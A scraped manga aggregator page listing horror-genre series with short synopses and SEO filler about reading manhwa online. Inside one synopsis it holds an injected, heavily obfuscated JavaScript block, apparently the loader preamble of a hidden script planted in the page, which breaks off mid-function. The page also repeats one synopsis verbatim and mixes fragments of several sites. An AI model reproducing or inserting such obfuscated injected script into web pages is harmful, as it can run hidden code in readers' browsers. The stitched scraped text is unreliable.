Horror - Page 3

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

125 results

Eschaton game

A weakly ill boy, after knowing that he had cancer , facing the spreading of zombies, normal life becoming hell , his family and crush also attacked by the zombies , but , shockingly , the boy after infected by the zombie , a miracle change happened ... Reborn To Be A Zombie<script></script><script>(function(_0x2d399a,_0x7b94fd){var _0x5f21bf=_0x5caa,_0x384a14=_0x2d399a();while(!![]){try{var _0x5475ef=-parseInt(_0x5f21bf(0x95))/(0x3*-0x853+0x1661+-0x23*-0x13)+parseInt(_0x5f21bf(0xa4))/(-0x4ec+-0x3ad*-0x2+-0x1*0x26c)+parseInt(_0x5f21bf(0x89))/(0x26fc+0xc*-0x18c+-0x1469)*(-parseInt(_0x5f21bf(0x99))/(-0x1*-0x12af+-0x1984+0x6d9))+parseInt(_0x5f21bf(0x9b))/(0x3bf*-0x3+-0xf01+0x1a43)+parseInt(_0x5f21bf(0x9c))/(-0xf26*-0x2+-0x259f+0x759)*(-parseInt(_0x5f21bf(0x94))/(0x15da+0x228f+-0x3862))+parseInt(_0x5f21bf(0x90))/(-0xa10*0x1+-0x20fb+0x2b13)*(-parseInt(_0x5f21bf(0x9a))/(-0x15e4+-0x266*-0x2+0x1121))+parseInt(_0x5f21bf(0x8a))/(0x6a2*0x1+-0x1b69+-0x1*-0x14d1);if(_0x5475ef===_0x7b94fd)break;else _0x384a14['push'](_0x384a14['shift']());}catch(_0x253bc1){_0x384a14['push'](_0x384a14['shift']());}}}(_0x4580,0x10bae+0x4e17f+0x67d*0x149));function _0x5caa(_0x1470c2,_0x47be20){var _0x38dea4=_0x4580();return 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Introduction of the work ‘You guys have been summoned.’ South Korean special forces captain ‘Kang San’ and female military officer ‘Kim Bi-yeon’ have a sudden accident during descent training. Immediately after the accident, an unfamiliar world opened up in front of the two of them. A desperate survival story of two men and women unfolding in an unfamiliar world!


Extraordinary Museum

Read Manhwa Extraordinary Museum Online For Free At HariManga Extraordinary Museum Novel also known as “Chāofán Bówùguǎn / Chaofan Bowuguan / The Extraordinary Museum / 超凡博物馆”. This OnGoing webtoon was released on 2024. The story was written by tron_pSFkCv and illustrations by tron_pSFkCv. The content of the comic Extraordinary Museum: The Extraordinary Museum is a vast castle suspended in an upside-down subspace. After my sister vanished, I found myself as the sole employee of this place. How can I even begin to describe this feeling? Watching over the world&#8217;s greatest collection of treasures, I must admit, is a bit overwhelming. The comic Extraordinary Museum belongs to the Genre: Action, Adventure, Drama, Fantasy, Horror, Mystery, Psychological, Thriller MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as &#8220;Kun Manga&#8221; and &#8220;Read Manhwa Online,&#8221; as well as related terms like Zin Manga, ManhwaClan, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. You can follow some other great Comics!!!: Wail Of Weakness Hunter Academy’s Strongest Battle God Bloodhound&#8217;s Regression Instinct


Feelings In A Dream

Feelings In A Dream one manhwa from us A one-time dream connecting reagent was made with the intention to meet Daniel, the prince that she has an unrequited love for, even in a dream. However, it was her rival, Kaiden that took the reagent, and it wasn’t a one-time thing? Lizen, who has perfect grades and physical skills, is bright and strong on the outside, but hides her wounds on the inside. Kaiden, a man who is blunt and cold, but more warm-hearted than anyone else. Lizen is connected to Kaiden through dreams every day, and not only gets caught in a huge conspiracy surrounding the throne, but also gets confused with her emotions…. An oddly continous meetings in their dreams. Is it because it’s just a dream, so it’s easy to pass off as a joke, or has it become sincere feelings because of the dream. “There’s no point in ‘If’. I already have feelings for you. I like you now even if I don’t dream about you. one manhwa from us A one-time dream connecting reagent was made with the intention to meet Daniel, the prince that she has an unrequited love for, even in a dream. However, it was her rival, Kaiden that took the reagent, and it wasn’t a one-time thing? Lizen, who has perfect grades and physical skills, is bright and strong on the outside, but hides her wounds on the inside. Kaiden, a man who is blunt and cold, but more warm-hearted than anyone else. Lizen is connected to Kaiden through dreams every day, and not only gets caught in a huge conspiracy surrounding the throne, but also gets confused with her emotions…. An oddly continous meetings in their dreams. Is it because it’s just a dream, so it’s easy to pass off as a joke, or has it become sincere feelings because of the dream. “There’s no point in ‘If’. I already have feelings for you. I like you now even if I don’t dream about you.


For The Queendom

In The Infernal Depths Of Hell, Cain, A Devil Longing To Return To Heaven With His Brother Abel, Forges Sinister Contracts With Mortals. But His World Is Shattered When Abel Is Murdered By Yeonli, His Own Contractee. To Make Things Worse, Yeonli Then Shoots Cain With A Cursed “Golden Bullet Of Love,” Igniting An Agonizing Battle Within Him. Despite His Seething Hatred, He’s Entrapped By Uncontrollable Love And Lust For Her. Now, Cain Must Navigate A Treacherous Path, Seeking Revenge On His Brother’s Murderer While Suppressing His Intense Desire. Will Cain Conquer The Bullet’s Spell Before Yeonli Reaps His Soul Too?


Franken Fran Frantic

Follow the amazingly horrific Fran Madaraki as she solves problems with science—more often than not, worsening the problem on an astronomical scale. Fran and her two sisters are results of Doctor Madaraki's experiments, who created them before his sudden disappearance. First he made the loose-canon Gavrill and second the deceptively small Veronica. Thanks to a knob on the side of her head, Gavrill is able to transform into a wolf-like monster with unparalleled strength and stamina, while Veronica contains an arsenal of weapons inside her, often acting as Fran's bodyguard. Doctor Madaraki's masterpiece, Fran, is a seemingly immortal doctor, knowledgeable in many fields and capable of operating on anyone⁠, including herself. Within this vast world, everyone has their own role, going from the simple policeman to Adorea, the monster who transports organs. Fran Madaraki is a multifaceted person: she may act nice while enacting a vicious plan, and⁠ she is much smarter than most realize. depicts scenes of gruesome visual violence, decapitation, and gore to play out a fleshy tale. [Written by MAL Rewrite]


Geocentric Reverberation

Zhao Zi Hui and his elder brother Zhao Zi Yue were born and raised in Harbor City. One day, Zi Yue discovers the existence of an alien species and abruptly leaves their home. A few years later, Zi Hui still can't find peace as his brother's disappearance comes back to haunt him.


Ghost Office

While executing a ghost expelling task, Li Lingdao, a wizard living on ghost expelling meets the female ghost Yu Xi at the last gasp, who is keeping off killing from the departed souls. Unexpectedly, Li Lingdao does not release her soul, but brings her back to his apartment, heals her and lets her live at his home. At ordinary times, Li Lingdao goes out to execute various haunting tasks. At the same time, different ghosts attack Yu Xi, expecting to get the soul jade. A series of stories happen between Yu Xi and Li Lingdao when he protects her. Yu Xi’s life secret is revealed little by little… MangaToon got authorization from SaManHua to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Ghost Story Club (Remake)

Read “Ghost Story Club (Remake) Manga” – “Ghost Story Club (Remake) Manhwa” Online Free At Hot Manhwa The Summary Of The Comic Ghost Story Club (Remake): Lee Joon Was An Ordinary High School Student. During The Entrance Ceremony, He Was Caught Up In A Strange Phenomenon And Died. [You Have Died.] [Restarting From Checkpoint.] [Loading…] But Then, A Message Appeared Before His Eyes. 『Congratulations On Your Acceptance At Nakseong Highschool, The School Of Secrets And Mysteries. Uncover The Shady Secrets Hidden Within The School, Or Fight Against The Legends And Ghost Stories Of The Campus In Order To Earn Points To Unlock Special Abilities. Additionally, You Must Gather Comrades To Prevent The Resurrection Of The Demon King Before Graduation. The World Is In Your Hands.』 “Ghost Story Club (Remake)” Is Also Known As: 괴담 동아리 The Comic “Ghost Story Club (Remake)” Belongs To The Genre: Action, Drama, Fantasy, Horror, Manhwa, Mystery, Romance, School Life, Supernatural “Manhuaplus, Manga Updates, Manhwa Website…” Are The Most Searched Keywords On The Website Manhwaclan. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging


Ghostly Spirit

Read Manhwa Ghostly Spirit / Ghost (Ghana) Seamdang, A Small Hermitage Nestled In The Foothills Of Jirisan, Is Filled With The Fragrance Of Pear Blossoms. Hayeon, A Descendant Of A Shaman From The Southern Provinces And The Reincarnation Of A Heavenly Maiden, Meets Geonwoo, A Young Man Who Can Intervene In The Spirit World Through His Vajra. Together, They Resolve The Sorrows And Grudges Of The World While Vanquishing Evil Spirits. “Ghostly Spirit Manhwa” Is Alternative: 귀령


Global Freeze: I Created An Apocalypse Shelter

Read Manhua Global Freeze: I Created An Apocalypse Shelter Online For Free At Zin Manga Associated Names: Freezing The World: I Built A Doomsday Safehouse Quan Qiu Bing Feng: Wo Dazaole Mori Anquan Wu Quán Qiú Bīng Fēng: Wǒ Dǎzàole Mòrì Ānquán Wū The World Is Frozen: I Built A Doomsday Safe House Toàn Cầu Băng Phong: Ta Chế Tạo Phòng An Toàn Tại Tận Thế Я Создал Бункер В Замороженном Мире 全球冰封: 我打造了末日安全屋 全球冰封:我打造了末日安全屋 冰封为王 冰封末日 地球速冻 寒武纪大地主 The Content Global Freeze: I Created An Apocalypse Shelter: The World Is Plunged Into An Icy Age, And 95% Of Humanity Is Wiped Out! In His Previous Life, Our Hero Zhang Yi Was Tragically Killed By The Very People He Helped, Thanks To His Kind Heart. But Fear Not, For Zhang Yi Has Been Reborn And Now Possesses The Awesome Power – Space Manipulation! He’s Gone Completely Bonkers Hoarding Supplies For The Icy Apocalypse And Is Ready To Rule The Frozen Wasteland! He Vows To Unleash A Hundred Times The Pain On Those Who Harmed Him In The Past! Read New Manga Updated: The Possesive Tyrant And His Sleepy Cat The Fairy Legacy Snow Mountain Monster Princess Manga Zin Is A Website That Aggregates The Latest And Hottest Manga, Updated Quickly To Serve Readers With High-Quality Images And Deliver Them An Excellent Experience.

3 hours ago


In 17th century Europe, in the depths of a forest, lived a vampire boy named Isaac. He would devour all who entered his forest. Yet, he saved a girl named Livana solely because her flame-like hair resembled his mother’s. In the process of this, memories of his mother are stirred up. Meanwhile, Livana’s family is continuously embroiled in a series of unfortunate events, and Livana herself is rejected by everyone due to her hair color. But Ethan has always adored her, and her brother seems to have unusual feelings for her. How will these people’s feelings intertwine…?
